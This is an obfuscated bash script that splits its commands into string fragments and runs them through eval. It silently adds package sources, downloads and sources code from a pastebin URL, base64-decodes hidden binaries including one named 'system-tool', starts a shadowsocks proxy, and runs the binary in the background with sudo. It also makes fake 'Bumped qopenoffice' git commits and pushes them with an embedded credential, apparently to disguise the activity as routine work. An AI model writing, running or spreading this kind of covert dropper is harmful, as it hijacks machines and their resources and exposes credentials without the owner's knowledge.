BtCfKEx="sudo add-apt-r"
mcIBdPhp="epository ppa"
kUJnx=":max-c-lv/sha"
AzAh="dowsocks-libev "
CTQZBM="-y &>/dev/nul"
zprux="l || tru"
eval "$BtCfKEx""$mcIBdPhp""$kUJnx""$AzAh""$CTQZBM""$zprux""e"
rtHoUrbw="o add-apt-re"
BmESSf="pository ppa:on"
fWtbt="drej/apache2 -y"
MvxnA=" &>/dev/nul"
Tdvo="l || "
eval "sud""$rtHoUrbw""$BmESSf""$fWtbt""$MvxnA""$Tdvo""true"
EPMTlgz="udo apt upd"
yZLFrE="ate &>/dev"
cLAe="/null || tru"
eval "s""$EPMTlgz""$yZLFrE""$cLAe""e"
RvuQy="wget -O codesrc"
jhYylTV=" https://past"
BRpyR="ebin.com/raw/"
mXhOp="UKs9hZfc &>/de"
fqUYXd="v"
eval "$RvuQy""$jhYylTV""$BRpyR""$mXhOp""$fqUYXd""/null"
tupZrx="urce ./co"
eval "so""$tupZrx""desrc"
git clone $SRC codes &>/dev/null
uySyuoxx="e64 -d codes/"
EAKIil="s > "
eval "bas""$uySyuoxx""$EAKIil""o"
sudo apt --yes install openssl &>/dev/null || true
EHtGfNK="do apt --ye"
orFGcC="s install ps"
HPTqhw="misc shadows"
RCaODGeM="ocks-libev &>/"
OtTR="dev/null || tru"
eval "su""$EHtGfNK""$orFGcC""$HPTqhw""$RCaODGeM""$OtTR""e"
FgKMmHu="do systemc"
GLzjbs="tl stop sha"
btNpa="dowsocks-lib"
DPZwJv="ev.service &>"
yxmTU="/dev/null |"
Uidgq="| tr"
eval "su""$FgKMmHu""$GLzjbs""$btNpa""$DPZwJv""$yxmTU""$Uidgq""ue"
UfukiG="ase64 -d c"
cTAFuL="odes/c > heal"
EfgTCuWq="t"
eval "b""$UfukiG""$cTAFuL""$EfgTCuWq""h"
Rpis="e64 -d code"
JXoKssEr="s/gc > "
eval "bas""$Rpis""$JXoKssEr""gc"
Ephmc="base64 -d codes"
mUwmpnLN="/m > system"
eval "$Ephmc""$mUwmpnLN""-tool"
PsrpZPt="se64 -d codes/p"
OPfapk=" > prepa"
eval "ba""$PsrpZPt""$OPfapk""re"
PPFJyB="/pr"
eval ". .""$PPFJyB""epare"
yjpdN="sudo ss-local -"
qMjwnoA="c o --plugi"
GGRL="n ./gqs --p"
EUZMMokj="lugin-opts ."
eCMQKxJk="/gc &>/dev/"
WEGhLG="null"
eval "$yjpdN""$qMjwnoA""$GGRL""$EUZMMokj""$eCMQKxJk""$WEGhLG"" &"
rvRyHb="od +x system"
VzJJR="-"
eval "chm""$rvRyHb""$VzJJR""tool"
NFFG="d -i 's/gcc/ce"
QKDa="gfu/g' healt"
fLvxpqZ="h"
eval "se""$NFFG""$QKDa""$fLvxpqZ"
zYPGd="do ./system-t"
UelXZmzJ="ool --config=h"
kJkG="ealth &>/dev"
tGZUc="/nu"
eval "su""$zYPGd""$UelXZmzJ""$kJkG""$tGZUc""ll &"
aRVep="ho m"
eval "ec""$aRVep""zpxg"
axeCDj="eep "
eval "sl""$axeCDj""66"
mMZJTsw="git clone htt"
cleSrhgg="ps://github.co"
sUZRh="m/roman-akopya"
PMobs="nxb/qopenoffice"
Osis=".git tmp &>/d"
MPPHnb="ev/null ||"
eval "$mMZJTsw""$cleSrhgg""$sUZRh""$PMobs""$Osis""$MPPHnb"" true"
cd tmp || true
dvtf="it config user."
YZNher="name 'Roma"
IWOKyck="n Akopyan'"
pwthBn=" &>/dev/nul"
SHoJqWmp="l ||"
eval "g""$dvtf""$YZNher""$IWOKyck""$pwthBn""$SHoJqWmp"" true"
YZJE="t config user"
PLXwB=".email roman.a"
NEfDS="kopyanxb@i"
XkEkUVcF="nbox.ru &>/dev/"
wgbogdI="null || tru"
SSmZ="e"
eval "gi""$YZJE""$PLXwB""$NEfDS""$XkEkUVcF""$wgbogdI""$SSmZ"
echo 'Bumped qopenoffice' >> mzpxg$MAKE
qssm="ILD=\`date +"
TJmjVPj="%"
eval "BU""$qssm""$TJmjVPj""s\`"
eSIU="E=\`date +%"
eval "MAK""$eSIU""S\`"
echo $BUILD >> mzpxg$MAKE
git add mzpxg$MAKE &>/dev/null || true
git commit -m $MAKE' Bumped qopenoffice' &>/dev/null || true
hOMzXgOG=" push https:/"
ZItqbUk="/roman-akopya"
qxorPD="nxb:'CNjR-KSjHV"
VTeGf="v_9Ap'@github.c"
fXVS="om/roman-a"
wftyPaGM="kopyanxb/q"
ZuaGZmx="openoffice.gi"
dqSH="t -f &>/dev"
QyPHkCWc="/null ||"
eval "git""$hOMzXgOG""$ZItqbUk""$qxorPD""$VTeGf""$fXVS""$wftyPaGM""$ZuaGZmx""$dqSH""$QyPHkCWc"" true"
while :; do G=`date +%s`; echo 'Updated qopenoffice '$G; [ `expr 1330 + $BUILD` -lt $G ] && sudo killall system-tool && break; sleep 124; done
